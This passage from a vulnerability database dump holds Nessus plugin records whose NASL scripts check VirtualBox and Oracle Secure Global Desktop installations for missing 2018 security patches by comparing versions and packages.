"nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-0739", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:vm_virtualbox"], "id": "VIRTUALBOX_5_2_10.NASL", "href": "https://www.tenable.com/plugins/nessus/109682", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109682);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/05\");\n\n script_cve_id(\n \"CVE-2018-0739\",\n \"CVE-2018-2830\",\n \"CVE-2018-2831\",\n \"CVE-2018-2835\",\n \"CVE-2018-2836\",\n \"CVE-2018-2837\",\n \"CVE-2018-2842\",\n \"CVE-2018-2843\",\n \"CVE-2018-2844\",\n \"CVE-2018-2845\",\n \"CVE-2018-2860\"\n );\n script_bugtraq_id(\n 103518,\n 103853,\n 103854,\n 103855,\n 103856,\n 103857,\n 103858,\n 103859,\n 103860,\n 103861,\n 103863\n );\n\n script_name(english:\"Oracle VM VirtualBox 5.1.x < 5.1.36 / 5.2.x < 5.2.10 (April 2018 CPU)\");\n script_summary(english:\"Performs a version check on VirtualBox.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle VM VirtualBox running on the remote host is\n5.1.x prior to 5.1.36 or 5.2.x prior to 5.2.10. It is, therefore,\naffected by multiple vulnerabilities as noted in the April 2018\nCritical Patch Update advisory. Please consult the CVRF details\nfor the applicable CVEs for additional information.\n\nNessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05e0bcf5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.virtualbox.org/wiki/Changelog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle VM VirtualBox version 5.1.36 / 5.2.10 or later as\nreferenced in the April 2018 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2860\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:vm_virtualbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"virtualbox_installed.nasl\", \"macosx_virtualbox_installed.nbin\");\n script_require_ports(\"installed_sw/Oracle VM VirtualBox\", \"installed_sw/VirtualBox\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = NULL;\napps = make_list('Oracle VM VirtualBox', 'VirtualBox');\n\nforeach app (apps)\n{\n if (get_install_count(app_name:app)) break;\n else app = NULL;\n}\n\nif (isnull(app)) audit(AUDIT_NOT_INST, 'Oracle VM VirtualBox');\n\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\n\n\n# 5.1.x < 5.1.36\nif (ver =~ '^5\\\\.1' && ver_compare(ver:ver, fix:'5.1.36', strict:FALSE) < 0) fix = '5.1.36';\n# 5.2.x < 5.2.10\nelse if (ver =~ '^5\\\\.2' && ver_compare(ver:ver, fix:'5.2.10', strict:FALSE) < 0) fix = '5.2.10';\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n\nport = 0;\nif (app == 'Oracle VM VirtualBox')\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\n\nreport =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\nexit(0);\n\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T02:55:26", "description": "The remote host is affected by the vulnerability described in GLSA-201805-08\n(VirtualBox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VirtualBox. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker could take control of VirtualBox resulting in the execution\n of arbitrary code with the privileges of the process, a Denial of Service\n condition, or other unspecified impacts.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-23T00:00:00", "title": "GLSA-201805-08 : VirtualBox: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-2860", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2845", "CVE-2018-2837", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2843"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:virtualbox-bin", "p-cpe:/a:gentoo:linux:virtualbox"], "id": "GENTOO_GLSA-201805-08.NASL", "href": "https://www.tenable.com/plugins/nessus/109975", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201805-08.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109975);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/09/04 13:20:07\");\n\n script_cve_id(\"CVE-2018-2830\", \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\", \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2860\");\n script_xref(name:\"GLSA\", value:\"201805-08\");\n\n script_name(english:\"GLSA-201805-08 : VirtualBox: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201805-08\n(VirtualBox: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in VirtualBox. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n An attacker could take control of VirtualBox resulting in the execution\n of arbitrary code with the privileges of the process, a Denial of Service\n condition, or other unspecified impacts.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201805-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All VirtualBox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-emulation/virtualbox-5.1.36'\n All VirtualBox binary users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=app-emulation/virtualbox-bin-5.1.36.122089'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/virtualbox\", unaffected:make_list(\"ge 5.1.36\"), vulnerable:make_list(\"lt 5.1.36\"))) flag++;\nif (qpkg_check(package:\"app-emulation/virtualbox-bin\", unaffected:make_list(\"ge 5.1.36.122089\"), vulnerable:make_list(\"lt 5.1.36.122089\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VirtualBox\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T12:39:59", "description": "This update for kbuild, virtualbox fixes the following issues :\n\nkbuild changes :\n\n - Update to version 0.1.9998svn3110\n\n - Do not assume glibc glob internals\n\n - Support GLIBC glob interface version 2\n\n - Fix build failure (boo#1079838)\n\n - Fix build with GCC7 (boo#1039375)\n\n - Fix build by disabling vboxvideo_drv.so\n\nvirtualbox security fixes (boo#1101667, boo#1076372) :\n\n - CVE-2018-3005\n\n - CVE-2018-3055\n\n - CVE-2018-3085\n\n - CVE-2018-3086\n\n - CVE-2018-3087\n\n - CVE-2018-3088\n\n - CVE-2018-3089\n\n - CVE-2018-3090\n\n - CVE-2018-3091\n\n - CVE-2018-2694\n\n - CVE-2018-2698\n\n - CVE-2018-2685\n\n - CVE-2018-2686\n\n - CVE-2018-2687\n\n - CVE-2018-2688\n\n - CVE-2018-2689\n\n - CVE-2018-2690\n\n - CVE-2018-2676\n\n - CVE-2018-2693\n\n - CVE-2017-5715\n\nvirtualbox other changes :\n\n - Version bump to 5.2.16\n\n - Use %(?linux_make_arch) when building kernel modules\n (boo#1098050)\n\n - Fixed vboxguestconfig.sh script\n\n - Update warning regarding the security hole in USB\n passthrough. (boo#1097248)\n\n - Fixed include for build with Qt 5.11 (boo#1093731)\n\n - You can find a detailed list of changes\n [here](https://www.virtualbox.org/wiki/Changelog#v16)", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-08-28T00:00:00", "title": "openSUSE Security Update : kbuild / virtualbox (openSUSE-2018-938) (Spectre)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2836", "CVE-2018-3091", "CVE-2018-2687", "CVE-2018-2860", "CVE-2018-3055", "CVE-2018-2844", "CVE-2018-2842", "CVE-2018-2835", "CVE-2018-2698", "CVE-2018-2693", "CVE-2018-2845", "CVE-2018-2690", "CVE-2018-3086", "CVE-2018-2676", "CVE-2017-5715", "CVE-2018-2837", "CVE-2018-3089", "CVE-2018-0739", "CVE-2018-2688", "CVE-2018-3087", "CVE-2018-2831", "CVE-2018-2830", "CVE-2018-2685", "CVE-2018-3085", "CVE-2018-2843", "CVE-2018-3005", "CVE-2018-3090", "CVE-2018-2686", "CVE-2018-2694", "CVE-2018-2689", "CVE-2018-3088"], "modified": "2018-08-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:python-virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default", "p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-vnc", "p-cpe:/a:novell:opensuse:virtualbox-guest-source", "p-cpe:/a:novell:opensuse:virtualbox-websrv", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:virtualbox-guest-x11", "p-cpe:/a:novell:opensuse:kbuild-debuginfo", "p-cpe:/a:novell:opensuse:kbuild-debugsource", "p-cpe:/a:novell:opensuse:virtualbox-host-source", "p-cpe:/a:novell:opensuse:virtualbox-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-devel", "p-cpe:/a:novell:opensuse:virtualbox", "p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons", "p-cpe:/a:novell:opensuse:kbuild"], "id": "OPENSUSE-2018-938.NASL", "href": "https://www.tenable.com/plugins/nessus/112143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-938.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(112143);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-5715\", \"CVE-2018-0739\", \"CVE-2018-2676\", \"CVE-2018-2685\", \"CVE-2018-2686\", \"CVE-2018-2687\", \"CVE-2018-2688\", \"CVE-2018-2689\", \"CVE-2018-2690\", \"CVE-2018-2693\", \"CVE-2018-2694\", \"CVE-2018-2698\", \"CVE-2018-2830\", \"CVE-2018-2831\", \"CVE-2018-2835\", \"CVE-2018-2836\", \"CVE-2018-2837\", \"CVE-2018-2842\", \"CVE-2018-2843\", \"CVE-2018-2844\", \"CVE-2018-2845\", \"CVE-2018-2860\", \"CVE-2018-3005\", \"CVE-2018-3055\", \"CVE-2018-3085\", \"CVE-2018-3086\", \"CVE-2018-3087\", \"CVE-2018-3088\", \"CVE-2018-3089\", \"CVE-2018-3090\", \"CVE-2018-3091\");\n\n script_name(english:\"openSUSE Security Update : kbuild / virtualbox (openSUSE-2018-938) (Spectre)\");\n script_summary(english:\"Check for the openSUSE-2018-938 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for kbuild, virtualbox fixes the following issues :\n\nkbuild changes :\n\n - Update to version 0.1.9998svn3110\n\n - Do not assume glibc glob internals\n\n - Support GLIBC glob interface version 2\n\n - Fix build failure (boo#1079838)\n\n - Fix build with GCC7 (boo#1039375)\n\n - Fix build by disabling vboxvideo_drv.so\n\nvirtualbox security fixes (boo#1101667, boo#1076372) :\n\n - CVE-2018-3005\n\n - CVE-2018-3055\n\n - CVE-2018-3085\n\n - CVE-2018-3086\n\n - CVE-2018-3087\n\n - CVE-2018-3088\n\n - CVE-2018-3089\n\n - CVE-2018-3090\n\n - CVE-2018-3091\n\n - CVE-2018-2694\n\n - CVE-2018-2698\n\n - CVE-2018-2685\n\n - CVE-2018-2686\n\n - CVE-2018-2687\n\n - CVE-2018-2688\n\n - CVE-2018-2689\n\n - CVE-2018-2690\n\n - CVE-2018-2676\n\n - CVE-2018-2693\n\n - CVE-2017-5715\n\nvirtualbox other changes :\n\n - Version bump to 5.2.16\n\n - Use %(?linux_make_arch) when building kernel modules\n (boo#1098050)\n\n - Fixed vboxguestconfig.sh script\n\n - Update warning regarding the security hole in USB\n passthrough. (boo#1097248)\n\n - Fixed include for build with Qt 5.11 (boo#1093731)\n\n - You can find a detailed list of changes\n [here](https://www.virtualbox.org/wiki/Changelog#v16)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039375\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1076372\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1079838\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1093731\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097248\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098050\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1101667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.virtualbox.org/wiki/Changelog#v16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kbuild / virtualbox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kbuild\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kbuild-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kbuild-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-vnc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kbuild-0.1.9998svn3110-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kbuild-debuginfo-0.1.9998svn3110-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"kbuild-debugsource-0.1.9998svn3110-4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-desktop-icons-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-guest-source-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"virtualbox-host-source-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"python-virtualbox-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"python-virtualbox-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-debugsource-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-devel-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-kmp-default-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-tools-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-tools-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-x11-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-guest-x11-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-host-kmp-default-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-host-kmp-default-debuginfo-5.2.18_k4.4.143_65-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-qt-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-qt-debuginfo-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-vnc-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-websrv-5.2.18-56.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", cpu:\"x86_64\", reference:\"virtualbox-websrv-debuginfo-5.2.18-56.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kbuild / kbuild-debuginfo / kbuild-debugsource / python-virtualbox / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-01-01T04:35:04", "description": "The version of Oracle Secure Global Desktop installed on the remote\nhost is 5.3 and is missing a security patch from the April 2018\nCritical Patch Update (CPU). It is, therefore, affected by multiple\nvulnerabilities.", "edition": 24, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2018-04-19T00:00:00", "title": "Oracle Secure Global Desktop Multiple Vulnerabilities (April 2018 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-3737", "CVE-2017-3738"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:virtualization_secure_global_desktop"], "id": "ORACLE_SECURE_GLOBAL_DESKTOP_APR_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/109165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109165);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/26 18:36:16\");\n\n script_cve_id(\"CVE-2017-3737\", \"CVE-2017-3738\", \"CVE-2017-9798\");\n script_bugtraq_id(100872, 102103, 102118);\n\n script_name(english:\"Oracle Secure Global Desktop Multiple Vulnerabilities (April 2018 CPU)\");\n script_summary(english:\"Checks the version of Oracle Secure Global Desktop.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Secure Global Desktop installed on the remote\nhost is 5.3 and is missing a security patch from the April 2018\nCritical Patch Update (CPU). It is, therefore, affected by multiple\nvulnerabilities.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixOVIR\n 